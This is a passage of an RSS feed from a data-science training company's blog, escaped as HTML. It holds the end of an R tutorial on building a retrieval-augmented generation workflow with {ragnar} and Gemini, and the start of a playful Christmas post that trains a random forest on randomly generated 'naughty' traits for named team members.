&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add the chunks to the knowledge store&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_insert&lt;/span&gt;(store, chunks)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Rebuild the store index&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_build_index&lt;/span&gt;(store)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that our knowledge store includes content from both the title page
and Chapter 7, let’s ask something more technical, like &lt;strong&gt;What are some
good practices for parallel computing in R?&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_retrieve&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; store,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;What are some good practices for parallel computing in R?&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 4 × 9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; origin doc_id chunk_id start end cosine_distance bm25 context text &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;lis&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 https://csgi… 1 &amp;lt;int&amp;gt; 1 2223 &amp;lt;dbl [2]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;&amp;#34; &amp;#34;# E…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 https://csgi… 2 &amp;lt;int&amp;gt; 1 1536 &amp;lt;dbl [1]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;&amp;#34; &amp;#34;# 7…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 https://csgi… 2 &amp;lt;int&amp;gt; 22541 23995 &amp;lt;dbl [1]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;# 7 E… &amp;#34;## …&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 https://csgi… 2 &amp;lt;int&amp;gt; 23996 26449 &amp;lt;dbl [2]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;# 7 E… &amp;#34;The…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Four chunks have been returned:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;One chunk from the title page of the textbook.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;One chunk from the start of Chapter 7.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Two chunks from &lt;a href="https://csgillespie.github.io/efficientR/performance.html#performance-parallel" rel="external"&gt;Section 7.5 (“Parallel
Computing”)&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It makes sense that we have chunks from Section 7.5, which appears to be
highly relevant to the question. By including the title page and the
start of Chapter 7, the LLM will also have access to useful metadata
in case the user wants to find out where the model is getting its
information from.&lt;/p&gt;
&lt;p&gt;Now that we have built and tested our retrieval tool, it’s time to
connect it up to a Gemini interface using {ellmer}. The code below will
create a &lt;code&gt;chat&lt;/code&gt; object allowing us to send user prompts to Gemini.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chat &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ellmer&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat_google_gemini&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; system_prompt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;You answer in approximately 10 words or less.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A system prompt has been included here to ensure a succinct response
from the model API.&lt;/p&gt;
&lt;p&gt;We can now register our retrieval tool with this chat interface.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_register_tool_retrieve&lt;/span&gt;(chat, store)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To check if our RAG workflow has been set up correctly, let’s chat with
the model.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chat&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;What are some good practices for parallel computing in R?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Use the `parallel` package, ensure you stop clusters with `stopCluster()` (or &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; `on.exit()`), and utilize `parLapply()`, `parApply()`, or `parSapply()`.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output looks plausible. Just to make sure, let’s check where the
model found this information.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chat&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Where did you get that answer from?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; I retrieved the information from &amp;#34;Efficient R programming&amp;#34; by Colin Gillespie &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; and Robin Lovelace.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Success! The LLM has identified the name of the textbook and, if we
wanted to, we could even ask about the specific chapter. A user
interacting with our model interface could now search online for this
textbook to fact-check the responses.&lt;/p&gt;
&lt;p&gt;In the example workflow above, we manually selected a couple of chapters
from the textbook to include in our knowledge store. It’s worth noting
that you can also use the &lt;code&gt;ragnar_find_links(url)&lt;/code&gt; function to retrieve
a list of links from a given webpage.&lt;/p&gt;
&lt;p&gt;Doing so for the title page will provide the links to all chapters.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_find_links&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://csgillespie.github.io/efficientR/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;https://csgillespie.github.io/efficientR/&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [2] &amp;#34;https://csgillespie.github.io/efficientR/building-the-book-from-source.html&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [3] &amp;#34;https://csgillespie.github.io/efficientR/collaboration.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [4] &amp;#34;https://csgillespie.github.io/efficientR/data-carpentry.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [5] &amp;#34;https://csgillespie.github.io/efficientR/hardware.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [6] &amp;#34;https://csgillespie.github.io/efficientR/index.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [7] &amp;#34;https://csgillespie.github.io/efficientR/input-output.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [8] &amp;#34;https://csgillespie.github.io/efficientR/introduction.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [9] &amp;#34;https://csgillespie.github.io/efficientR/learning.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [10] &amp;#34;https://csgillespie.github.io/efficientR/performance.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [11] &amp;#34;https://csgillespie.github.io/efficientR/preface.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [12] &amp;#34;https://csgillespie.github.io/efficientR/programming.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [13] &amp;#34;https://csgillespie.github.io/efficientR/references.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [14] &amp;#34;https://csgillespie.github.io/efficientR/set-up.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [15] &amp;#34;https://csgillespie.github.io/efficientR/workflow.html&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You could then iterate through these links, extracting the contents from
each webpage and inserting these into your RAG knowledge store. Just
note, however, that including additional information in your store will
likely increase the amount of text being sent to the model, which could
raise costs. You should therefore think about what information is
actually relevant for your LLM application.&lt;/p&gt;
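&lt;p&gt;The iteration described above could be sketched as follows. This is a
minimal outline rather than a tested pipeline: the wrapper
&lt;code&gt;add_pages_to_store()&lt;/code&gt; and its &lt;code&gt;skip&lt;/code&gt; argument are our own invention,
it only uses the {ragnar} functions already shown in this post, and it
assumes network access, a configured Gemini API key and an existing
&lt;code&gt;store&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical wrapper: insert the contents of several webpages into a store
add_pages_to_store = function(store, links, skip = character()) {
  # Drop any pages we do not want, such as those already in the store
  links = setdiff(links, skip)
  for (link in links) {
    chunks = link |&amp;gt;
      ragnar::read_as_markdown() |&amp;gt;
      ragnar::markdown_chunk()
    ragnar::ragnar_store_insert(store, chunks)
  }
  # Rebuild the index once, after all pages have been inserted
  ragnar::ragnar_store_build_index(store)
  invisible(store)
}

# Example usage (not run here):
# links = ragnar::ragnar_find_links(&amp;#34;https://csgillespie.github.io/efficientR/&amp;#34;)
# add_pages_to_store(store, links, skip = url)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Passing a &lt;code&gt;skip&lt;/code&gt; vector is one simple way to leave out pages that add
little value, such as the references, or pages that have already been inserted.&lt;/p&gt;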
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In summary, we have introduced the concept of retrieval-augmented
generation for LLM-powered workflows and built an example workflow in R
using open source packages.&lt;/p&gt;
&lt;p&gt;Before finishing, we are excited to announce that our new course
“LLM-Driven Applications with R &amp;amp; Python” has just been added to our
training portfolio. You can search for it
&lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you’re interested in practical AI-driven workflows, we would love to
see you at our upcoming &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI In Production
2026&lt;/a&gt; conference which is
running from 4-5 June in Newcastle-Upon-Tyne. If you would like to
present a talk or workshop, please submit your abstracts before the
deadline on &lt;strong&gt;23 January&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Machine Learning Powered Naughty List: A Festive Jumping Rivers Story</title><link>https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/</link><pubDate>Thu, 18 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Ho ho ho! 🎅 The holiday season is here, and at Jumping Rivers, we’re
decking the halls with data, not just tinsel. While elves are busy
checking their lists twice, we thought: why not bring a little &lt;strong&gt;machine
learning magic&lt;/strong&gt; to Christmas? After all, what’s more festive than
combining predictive modeling with candy canes, cookies, and a sprinkle
of office mischief?&lt;/p&gt;
&lt;p&gt;This blog is your all-access pass to a code-powered journey where we
find out who’s been naughty, who’s nice, and who’s just mischievously
hovering in between.&lt;/p&gt;
&lt;p&gt;We’ll walk you through the process step by step: gathering the team
data, inventing the most festive features, training our ML model, and
revealing the results with a cheeky, holiday twist. So grab a mug of
cocoa, put on your favorite Christmas socks, and let’s dive into the
Jumping Rivers ML-Powered Naughty List adventure!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: All data, labels, and results in this post are entirely
fictional and randomly generated for festive fun.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="step-1-data-collection-and-team-introduction"&gt;Step 1: Data Collection and Team Introduction&lt;/h2&gt;
&lt;p&gt;Our first step was gathering our dataset. We used the Jumping Rivers
team as the participants, assigning playful, holiday-themed features to
reflect their potential ‘naughty’ traits. Here’s a concise, festive
overview in a side-by-side table format:&lt;/p&gt;
&lt;iframe width="100%" height="500" src="https://www.jumpingrivers.com/misc/shiny-reactable/html_files/christmas_table.html" alt="reactable table showing JR staff members and their roles" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;Each participant is assigned four playful features that represent
holiday mischief:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ate too many cookies 🍪&lt;/li&gt;
&lt;li&gt;Forgot to send Christmas cards 💌&lt;/li&gt;
&lt;li&gt;Sang off-key during carols 🎶&lt;/li&gt;
&lt;li&gt;Gift wrapping disasters 🎁&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Every name on this list is now in the running for the ultimate festive
title: Naughty, Nice, or Mildly Mischievous. Rumor has it that Santa’s
Intern Elf already claimed the top spot for cookie mischief, while
Rudolph keeps dashboards squeaky clean, and Frosty the Snow Analyst is
maintaining a perfectly balanced winter score.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-christmas-naughty-list"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="step-2-feature-engineering"&gt;Step 2: Feature Engineering&lt;/h2&gt;
&lt;p&gt;For ML purposes, names were encoded numerically. This is not meaningful
in a real-world ML context but serves as a demonstration of
preprocessing. The features for modeling include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Name (encoded)&lt;/li&gt;
&lt;li&gt;Ate too many cookies&lt;/li&gt;
&lt;li&gt;Forgot to send Christmas cards&lt;/li&gt;
&lt;li&gt;Sang off-key&lt;/li&gt;
&lt;li&gt;Gift wrapping disasters&lt;/li&gt;
&lt;/ul&gt;
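&lt;p&gt;To see why the encoded name carries no real meaning, consider the small
base R example below, which uses three made-up entries rather than the
full team. Converting to a factor and then to numeric simply numbers the
names in alphabetical order.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Illustrative names only (not the full team)
names_demo = c(&amp;#34;Rudolph&amp;#34;, &amp;#34;Frosty&amp;#34;, &amp;#34;Santa&amp;#34;)

# Factor levels are sorted alphabetically: Frosty, Rudolph, Santa
encoded = as.numeric(factor(names_demo))
encoded
#&amp;gt; [1] 2 1 3
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The resulting numbers reflect alphabetical position and nothing about
festive behaviour, so any pattern the model finds in them is spurious.&lt;/p&gt;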
&lt;h2 id="step-3-model-training"&gt;Step 3: Model Training&lt;/h2&gt;
&lt;p&gt;We chose a Random Forest classifier in R for its simplicity and
interpretability. The model was trained on the dataset to predict the
‘naughty’ label based on the four behavioral features and the encoded
name. Although the dataset is small and playful, this demonstrates a
proper ML workflow: data collection, preprocessing, model training and
prediction.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyverse)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(randomForest)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing we need to do is set up a vector containing the team
members along with some Christmas temp workers: Santa’s Intern Elf,
Rudolph the Data Reindeer and Frosty the Snow Analyst.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Team members&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;team &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Esther Gillespie&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Colin Gillespie&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sebastian Mellor&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Martin Smith&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Richard Brown&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Shane Halloran&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Mitchell Oliver&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Keith Newman&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Russ Hyde&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Gigi Kenneth&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Pedro Silva&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Carolyn Wilson&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Myles Mitchell&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo Roe&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Tim Brock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Osheen MacOscar&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Emily Wales&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Amieroh Abrahams&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Deborah Washington&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Susan Smith&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Santa&amp;#39;s Intern Elf&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Rudolph the Data Reindeer&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Frosty the Snow Analyst&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that we have the team members, we will &lt;strong&gt;randomly&lt;/strong&gt; generate some values
for the model features.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Randomly generate playful &amp;#39;naughty traits&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set.seed&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;51&lt;/span&gt;)
